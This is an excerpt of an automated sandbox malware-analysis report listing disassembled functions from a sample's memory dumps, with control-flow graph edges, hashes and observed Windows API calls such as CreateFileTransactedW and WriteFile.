                                      • Snapshot File: hcaresult_16_2_7ffb4ae20000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: HKJ$HVJ$X_J$`[J$hIJ$hxJ$pJ
                                      • API String ID: 0-2008210366
                                      • Opcode ID: 5da56f9afbd9314e962bc47a901b2948f4491608e24bab87269dcd88301de6bb
                                      • Instruction ID: 21918daa0b7ba1463832b6599c2c36de72678d0283ca8d8982f3a1e78e004841
                                      • Opcode Fuzzy Hash: 5da56f9afbd9314e962bc47a901b2948f4491608e24bab87269dcd88301de6bb
                                      • Instruction Fuzzy Hash: 9562E3B2A1C91A4FE798FF78C5656B87796FF98300F2441F9D41DC3286CD28AD468781
                                      Function 00007FFB4B20E718 Relevance: 2.7, Strings: 2, Instructions: 158COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 479 7ffb4b20e718-7ffb4b20e730 481 7ffb4b20e738-7ffb4b20e763 479->481 485 7ffb4b20e78c-7ffb4b20e792 481->485 486 7ffb4b20e799-7ffb4b20e79f 485->486 487 7ffb4b20e7a1-7ffb4b20e7a6 486->487 488 7ffb4b20e765-7ffb4b20e77e 486->488 489 7ffb4b20e7ac-7ffb4b20e7e1 487->489 490 7ffb4b20e693-7ffb4b20e6d8 487->490 491 7ffb4b20e784-7ffb4b20e789 488->491 492 7ffb4b20e875-7ffb4b20e885 488->492 490->486 497 7ffb4b20e6de-7ffb4b20e6e4 490->497 491->485 498 7ffb4b20e887 492->498 499 7ffb4b20e888-7ffb4b20e8d6 492->499 500 7ffb4b20e695-7ffb4b20e86d 497->500 501 7ffb4b20e6e6 497->501 498->499 500->492 502 7ffb4b20e70f-7ffb4b20e716 501->502 502->479 506 7ffb4b20e6e8-7ffb4b20e701 502->506 506->492 508 7ffb4b20e707-7ffb4b20e70c 506->508 508->502
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $hVJ
                                      • API String ID: 0-1932429268
                                      • Opcode ID: 52d4b4eeee77ab4f613a41b6a79d888750f6b1f20d98d83758413d7881da3e10
                                      • Instruction ID: 37ba8a88a0a6ded34b47d8cd25006d309c71785099b8827b449c0e9dc4e0b677
                                      • Opcode Fuzzy Hash: 52d4b4eeee77ab4f613a41b6a79d888750f6b1f20d98d83758413d7881da3e10
                                      • Instruction Fuzzy Hash: 9E5180B0D0D60E9FDB99FFA8C5555BDBBB1EF58300F1044BAC10AE72A1CA386841CB50
                                      Function 00007FFB4AE59138 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 566 7ffb4ae59138-7ffb4ae59141 567 7ffb4ae5918b-7ffb4ae59261 566->567 568 7ffb4ae59143-7ffb4ae59167 566->568 569 7ffb4ae59264-7ffb4ae592fc GetSystemInfo 567->569 570 7ffb4ae59263 567->570 574 7ffb4ae592fe 569->574 575 7ffb4ae59304-7ffb4ae59325 569->575 570->569 574->575
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae41000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 42e9a5eeb6dc947d36041eb9a32cde715437b196998490b6ce6ace65bbeed987
                                      • Instruction ID: 66ca4ca2cacb37e5c08e1b9affa132e7bc40bc4857c267b33255d8cbd5fe0561
                                      • Opcode Fuzzy Hash: 42e9a5eeb6dc947d36041eb9a32cde715437b196998490b6ce6ace65bbeed987
                                      • Instruction Fuzzy Hash: 0561E3B280DBC88FD716DB7898656E57FF0EF57210F0941DBC089CB1A3E6286856C752
                                      Function 00007FFB4B209401 Relevance: 1.7, Strings: 1, Instructions: 418COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 577 7ffb4b209401 578 7ffb4b209406-7ffb4b20940e 577->578 579 7ffb4b209591-7ffb4b2095a5 578->579 580 7ffb4b209414-7ffb4b209426 call 7ffb4b208dd0 578->580 581 7ffb4b2095ac-7ffb4b2095b7 579->581 582 7ffb4b2095a7 579->582 585 7ffb4b2093f5-7ffb4b2093fc 580->585 586 7ffb4b209428-7ffb4b20942d 580->586 582->581 587 7ffb4b2095d0-7ffb4b2095d5 585->587 588 7ffb4b20944f-7ffb4b209460 586->588 589 7ffb4b20942f-7ffb4b209433 586->589 587->577 590 7ffb4b209466-7ffb4b20947b 588->590 591 7ffb4b2095da-7ffb4b2095f5 588->591 592 7ffb4b209533-7ffb4b209544 589->592 593 7ffb4b209439-7ffb4b20944a 589->593 590->591 594 7ffb4b209481-7ffb4b20948d 590->594 600 7ffb4b2095fd 591->600 601 7ffb4b2095f7 591->601 595 7ffb4b20954b-7ffb4b209556 592->595 596 7ffb4b209546 592->596 593->579 598 7ffb4b2094be-7ffb4b2094d4 call 7ffb4b208dd0 594->598 599 7ffb4b20948f-7ffb4b2094a6 call 7ffb4b2078e0 594->599 596->595 598->592 611 7ffb4b2094d6-7ffb4b2094e1 598->611 599->592 609 7ffb4b2094ac-7ffb4b2094bb call 7ffb4b207a10 599->609 604 7ffb4b2095ff 600->604 605 7ffb4b209601-7ffb4b209663 600->605 601->600 604->605 608 7ffb4b209641-7ffb4b209643 604->608 628 7ffb4b20962b-7ffb4b209667 605->628 629 7ffb4b20966e-7ffb4b20968c 605->629 615 7ffb4b20968e-7ffb4b2096c0 608->615 616 7ffb4b209645-7ffb4b209660 608->616 609->598 611->591 614 7ffb4b2094e7-7ffb4b2094fc 611->614 614->591 618 7ffb4b209502-7ffb4b209515 614->618 631 7ffb4b2097a8-7ffb4b2097ad 615->631 622 7ffb4b209517-7ffb4b209531 call 7ffb4b2078e0 618->622 623 7ffb4b209569-7ffb4b209571 618->623 622->592 632 7ffb4b209557-7ffb4b209566 call 7ffb4b207a10 622->632 630 7ffb4b209579-7ffb4b20957c 623->630 628->608 635 7ffb4b209583-7ffb4b20958b 630->635 648 7ffb4b2096dc-7ffb4b2097b7 631->648 649 7ffb4b2097c1-7ffb4b2097df 631->649 632->623 635->579 638 7ffb4b2093ca-7ffb4b2093d7 635->638 638->635 642 7ffb4b2093dd-7ffb4b2093f1 638->642 642->635 657 7ffb4b20978d-7ffb4b2097a5 648->657 658 7ffb4b209706-7ffb4b209709 648->658 657->631 658->657 659 7ffb4b20970f-7ffb4b209712 658->659 661 7ffb4b20977b-7ffb4b209782 659->661 662 7ffb4b209714-7ffb4b209741 659->662 663 7ffb4b209742-7ffb4b20975c 661->663 664 7ffb4b209784-7ffb4b20978c 661->664 666 7ffb4b2097e1-7ffb4b209831 call 7ffb4b206020 663->666 667 7ffb4b209762-7ffb4b20976d 663->667 667->666 668 7ffb4b20976f-7ffb4b209779 667->668 668->661
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: iJ
                                      • API String ID: 0-1558532674
                                      • Opcode ID: 1397dd416c6f5384908329efc5819b1739f7c76657a2eaec8a62f6ea4cef5c00
                                      • Instruction ID: 9204906573a8665612ff3732219c03db78e6580d47a7dcfc2d4bd2460aab92fb
                                      • Opcode Fuzzy Hash: 1397dd416c6f5384908329efc5819b1739f7c76657a2eaec8a62f6ea4cef5c00
                                      • Instruction Fuzzy Hash: 5CE1F3B090DA168FD769FF2CD6955B57BE1FF54300B10857EC38B836A2DA29B8428741
                                      Function 00007FFB4AE56D65 Relevance: 1.7, APIs: 1, Instructions: 157COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 676 7ffb4ae56d65-7ffb4ae56df2 680 7ffb4ae56dfc-7ffb4ae56e78 CreateFileTransactedW 676->680 681 7ffb4ae56df4-7ffb4ae56df9 676->681 682 7ffb4ae56e80-7ffb4ae56eaa 680->682 683 7ffb4ae56e7a 680->683 681->680 683->682
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae41000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID: CreateFileTransacted
                                      • String ID:
                                      • API String ID: 2149338676-0
                                      • Opcode ID: 4e453bcc3ea801e8c9d7702257aabf3ad18e5f008712be83c815f36db2eed36c
                                      • Instruction ID: eb754218a369b8ccf3e7e283686172b28e5f4ea9c6cb3b2ca3b59ed11b7d6588
                                      • Opcode Fuzzy Hash: 4e453bcc3ea801e8c9d7702257aabf3ad18e5f008712be83c815f36db2eed36c
                                      • Instruction Fuzzy Hash: BD41AF7181CB588FDB58EF9CD8456A97BE0FBA9710F1442AFE449D3251CA70A8458BC2
                                      Function 00007FFB4AE56F41 Relevance: 1.6, APIs: 1, Instructions: 137fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 685 7ffb4ae56f41-7ffb4ae56fd1 689 7ffb4ae56fdb-7ffb4ae57025 WriteFile 685->689 690 7ffb4ae56fd3-7ffb4ae56fd8 685->690 691 7ffb4ae5702d-7ffb4ae57055 689->691 692 7ffb4ae57027 689->692 690->689 692->691
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE41000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE41000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae41000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID: FileWrite
                                      • String ID:
                                      • API String ID: 3934441357-0
                                      • Opcode ID: 2032150f1df179262d9dab586fe306d90c3d22cd089acfa29df037cffeba60c2
                                      • Instruction ID: 60468814bd5f4e99914cdb4d012b93af2479cc3d82e5f764a80585041854c398
                                      • Opcode Fuzzy Hash: 2032150f1df179262d9dab586fe306d90c3d22cd089acfa29df037cffeba60c2
                                      • Instruction Fuzzy Hash: 8E31C27190CB5C8FDB58EF98D8456F9BBE1FBA9311F00426FD049D3292CB74A8568B81
                                      Function 00007FFB4B2030F8 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: a716b38957d8eeef60baffec5428ed390d28bd5f6825842bab52085eb7a4d028
                                      • Instruction ID: f5129e49b45397e42fee977d02d3dfede0106cc19f916f75f85567b822445d47
                                      • Opcode Fuzzy Hash: a716b38957d8eeef60baffec5428ed390d28bd5f6825842bab52085eb7a4d028
                                      • Instruction Fuzzy Hash: C0517CB1D0C60A9FDB49FFA8C5515EDBBB1EF59300F1081BAC10AE7296CA382906CB50
                                      Function 00007FFB4AE108D0 Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 79176f94aa97e111583e1936cc01c810336878e16cb3d962072ae04d4e7dd6d2
                                      • Instruction ID: 3333a4ba9c35c3cb8dc20ae3134ce0cbbf136305753ed91be9d7bc1ae764c5ea
                                      • Opcode Fuzzy Hash: 79176f94aa97e111583e1936cc01c810336878e16cb3d962072ae04d4e7dd6d2
                                      • Instruction Fuzzy Hash: 16415BA2A4D6754FE306BBB8E09A1FD7F84EF45324B2441FFD94EC7193CD0868528295
                                      Function 00007FFB4B208148 Relevance: 1.4, Strings: 1, Instructions: 128COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: e4122d0cef1c1a9c390d06a59bf0c7c1750bd49c602335ec7795794d261a6890
                                      • Instruction ID: 3062563eb11ffe4cf2c0db6a8136e38457f84de3e1b267980ced02b0d891ea5d
                                      • Opcode Fuzzy Hash: e4122d0cef1c1a9c390d06a59bf0c7c1750bd49c602335ec7795794d261a6890
                                      • Instruction Fuzzy Hash: 7E410EB0D0860E9FDF49EFA4C5505FEBBB1FF45304F5081B9C25AAB295CA396906CB50
                                      Function 00007FFB4AE10960 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: d49edd1027f6e65f4ea0ef0d0fa5320480b530ee881acd2e1afc5715c7d5e9f2
                                      • Instruction ID: 5a9cffb63fa9c7b50c8c4669bed69d375604f0ed76a4ddf0e0fa6ba2c66d53ab
                                      • Opcode Fuzzy Hash: d49edd1027f6e65f4ea0ef0d0fa5320480b530ee881acd2e1afc5715c7d5e9f2
                                      • Instruction Fuzzy Hash: 213157B1A0EA6A1FF355BA7CE48A5F97BC5EF44321B6441FED80EC71D3CC1868428295
                                      Function 00007FFB4AE10998 Relevance: 1.4, Strings: 1, Instructions: 104COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE10000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae10000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: X7J
                                      • API String ID: 0-3311591319
                                      • Opcode ID: 213befb796702b3a279c7055f8bd53ebd2c39593ca9397fa89cbfea0e9b10d86
                                      • Instruction ID: af245a48f1ea8018efed116814b1432066f80bd0951944f7f5e3c736aa5e1463
                                      • Opcode Fuzzy Hash: 213befb796702b3a279c7055f8bd53ebd2c39593ca9397fa89cbfea0e9b10d86
                                      • Instruction Fuzzy Hash: DC31F3B0B1D9691FE388FE3CC09A6B57BC6EF98310B6401FDD40EC3293DC18A8428245
                                      Function 00007FFB4AE23BC9 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2700433545.00007FFB4AE20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AE20000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4ae20000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: I
                                      • API String ID: 0-3707901625
                                      • Opcode ID: 0f60636208b9d7da48f72223a6f5c3146ee632fa96c0ea1c52570ba7d52e8b66
                                      • Instruction ID: 8715a9856d9d143fde108678bc6fa386ee7ed3c95a9e54b0230deddbe37f844c
                                      • Opcode Fuzzy Hash: 0f60636208b9d7da48f72223a6f5c3146ee632fa96c0ea1c52570ba7d52e8b66
                                      • Instruction Fuzzy Hash: D0E0EDB154E7D44FD70AEB7488698443F60AE6B25178A41EEC045CF1A3D62D8849C701
                                      Function 00007FFB4B20C6A0 Relevance: .7, Instructions: 688COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3c8419611bfe55592b0e52ccd6abc878fcbd28c2ca211c7faeed36ba9d321eb5
                                      • Instruction ID: 5f690370ad21bd97e5709a0d866e3b96acea811e02f09bd1f0e5c91b836ddcf3
                                      • Opcode Fuzzy Hash: 3c8419611bfe55592b0e52ccd6abc878fcbd28c2ca211c7faeed36ba9d321eb5
                                      • Instruction Fuzzy Hash: 213287B0A1DA198FDF98FF28C99597977E1FF54310B1481B9D24EC72A2DE24AC45CB40
                                      Function 00007FFB4B20B7E1 Relevance: .5, Instructions: 522COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d7ca600d09ea603b30cf0a3ddfbe75cc7ffd07b4b958fb4207bb0389a3aa5d96
                                      • Instruction ID: 38321f386acf1a0c726010a2669ce3c0de983c8d6c00e5b0285a01ac154f14bf
                                      • Opcode Fuzzy Hash: d7ca600d09ea603b30cf0a3ddfbe75cc7ffd07b4b958fb4207bb0389a3aa5d96
                                      • Instruction Fuzzy Hash: 8DF12134748819AFDB89FF2CC499E6573D2EBA8704B1540A8E10EC76B6CD29EC55CB81
                                      Function 00007FFB4B20336F Relevance: .5, Instructions: 461COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 611054208006853db0862a06aaedbe1d246ab6a98c0cf3378e0eafecca47814b
                                      • Instruction ID: f4c22430a560ac93439a3d4c9d8e7a5efc2bc9157e535e510d1087fb32580bd4
                                      • Opcode Fuzzy Hash: 611054208006853db0862a06aaedbe1d246ab6a98c0cf3378e0eafecca47814b
                                      • Instruction Fuzzy Hash: FC02D5B051C6558FEF59EF28C5D06B57BA1FF49300F5481BDC94A8B69ACA38E881CB41
                                      Function 00007FFB4B2083BF Relevance: .5, Instructions: 455COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6ebafcdff7947f4aa009ae67e5813cf47f73088f276f6eb757b0d027c4975f91
                                      • Instruction ID: 9cff041c637af0e4be27d979c1f294f1b0ff0867d57dcae74ae03959e68a0f6f
                                      • Opcode Fuzzy Hash: 6ebafcdff7947f4aa009ae67e5813cf47f73088f276f6eb757b0d027c4975f91
                                      • Instruction Fuzzy Hash: 5A02B47091C6558FDF49EF28C5D06B57BA1FF45300F5486BDCA4E8B69ACA38A881CB41
                                      Function 00007FFB4B20E98F Relevance: .4, Instructions: 434COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f57af41e059f4cfcc5f986e886e1d0eecfafddbf308cfda893ba0e63f688842f
                                      • Instruction ID: cd6918cfda62b184dbd15c99c0f1e4e6716e6349df3f9ceb5f5e637c576405a7
                                      • Opcode Fuzzy Hash: f57af41e059f4cfcc5f986e886e1d0eecfafddbf308cfda893ba0e63f688842f
                                      • Instruction Fuzzy Hash: 2FF1E57091C6458FEB89FF24C5D06B57BA1FF45300F5486BDD94E8B69ACA38E881CB81
                                      Function 00007FFB4B2043B1 Relevance: .4, Instructions: 416COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a214ce77a38a8c9292b2bb7aa00c8e9790d06230df91a98e98a7a9e9ea9ed38
                                      • Instruction ID: ef26b1f809b74a2f4ec9cb143bfd6354cf8ee6e32c30bf3b0e11aad611d897be
                                      • Opcode Fuzzy Hash: 2a214ce77a38a8c9292b2bb7aa00c8e9790d06230df91a98e98a7a9e9ea9ed38
                                      • Instruction Fuzzy Hash: 12E1F0B091CA068FD769FF28D6905757BF1FF44304B14C57EC69AC39A3DA29B8428B41
                                      Function 00007FFB4B20E9AF Relevance: .3, Instructions: 336COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de7d2570eed1194faf27445062abc3b3c588315b8c83af858747e4cf367db9c9
                                      • Instruction ID: e7601763cee54253e71c91f4ce6f9e30cfb6c1f9072bdcd4c8a1bb0987573bb9
                                      • Opcode Fuzzy Hash: de7d2570eed1194faf27445062abc3b3c588315b8c83af858747e4cf367db9c9
                                      • Instruction Fuzzy Hash: 3BC1C37091C5468BEB4DFF24C5D05B53BA1FF85310B548ABDDA4B8B69BC638E481CB41
                                      Function 00007FFB4B20338F Relevance: .3, Instructions: 335COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6291323434a864c41735c616a7b3692c1e900478d9a9396ae207fee736f2e815
                                      • Instruction ID: 1901729137db4f447cae23fe782227a5a80084a437596d3f7ec506928db913f3
                                      • Opcode Fuzzy Hash: 6291323434a864c41735c616a7b3692c1e900478d9a9396ae207fee736f2e815
                                      • Instruction Fuzzy Hash: 11C1A5B051C5468BEB0DEF28D1D45B63BA1FF49310B5485BDCA4B8B6ABCA38F441CB85
                                      Function 00007FFB4B2083DF Relevance: .3, Instructions: 334COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0851a3e0c077a13fac63caf82f635164aea2d21b65ea28158c2450140337bbe4
                                      • Instruction ID: 873e0db3c5c4d0135c3ccc1576825503153278e802d6519f95e9104bb89d2883
                                      • Opcode Fuzzy Hash: 0851a3e0c077a13fac63caf82f635164aea2d21b65ea28158c2450140337bbe4
                                      • Instruction Fuzzy Hash: 9BC1B17051C6468FEF49EF28C5D05B23BA1FF45311B5486BDCA8A8F69BDA38E441CB41
                                      Function 00007FFB4B20E242 Relevance: .3, Instructions: 328COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8c838b570a27b9e7627f39f1f64e49a0c90e003e65870d7694f713dca478fd76
                                      • Instruction ID: 5dc030ff34684b9a4e84846cb8508c83a42a42fb7fed06e3b5a9840b44e5f8c4
                                      • Opcode Fuzzy Hash: 8c838b570a27b9e7627f39f1f64e49a0c90e003e65870d7694f713dca478fd76
                                      • Instruction Fuzzy Hash: CFC1F9B091CA468FDB89FF34C1916A4BBA1FF58300F448579C64EC7A96DB28B891C791
                                      Function 00007FFB4B21629E Relevance: .3, Instructions: 315COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26f821ff2b3658361a062c9691896aa1a14451749047a9596cb8cc186c9b6e1b
                                      • Instruction ID: 6ed80260e5de1fc7519840cb8bc8cac1b86abec2312664057dac340f06efecfa
                                      • Opcode Fuzzy Hash: 26f821ff2b3658361a062c9691896aa1a14451749047a9596cb8cc186c9b6e1b
                                      • Instruction Fuzzy Hash: 9DA1A27060CA4D8FDBA9EF28D8557F97BD1FB58310F04826EE84DC3295CA74A9458B82
                                      Function 00007FFB4B205637 Relevance: .3, Instructions: 311COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 640ca0354a7f667e52354f9d4acc0185309c5d77ebd9cb754bf1afdf85f0200b
                                      • Instruction ID: 8bbdefb2dc322e5558d27b56039418f6da6c11937c3bbe78c935e0dafeb4dcdb
                                      • Opcode Fuzzy Hash: 640ca0354a7f667e52354f9d4acc0185309c5d77ebd9cb754bf1afdf85f0200b
                                      • Instruction Fuzzy Hash: 9121D4C6E0D59786FA257D78E6960FC6E409F53320F1C8ABADF4D960E6CC0C28D553A2
                                      Function 00007FFB4B200607 Relevance: .3, Instructions: 306COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000010.00000002.2707072828.00007FFB4B200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_16_2_7ffb4b200000_yxeaYbTPMzNPCanFqSswYWhX.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 096c85fa3b074c8f329102db7a41b4d1d874a7072c2246b52cdb11398219af4e
                                      • Instruction ID: a34173f92b17318b5c8a057aa9ab6db5f6bd7db40f11e28d9b6b8c98dd4d3d61
                                      • Opcode Fuzzy Hash: 096c85fa3b074c8f329102db7a41b4d1d874a7072c2246b52cdb11398219af4e
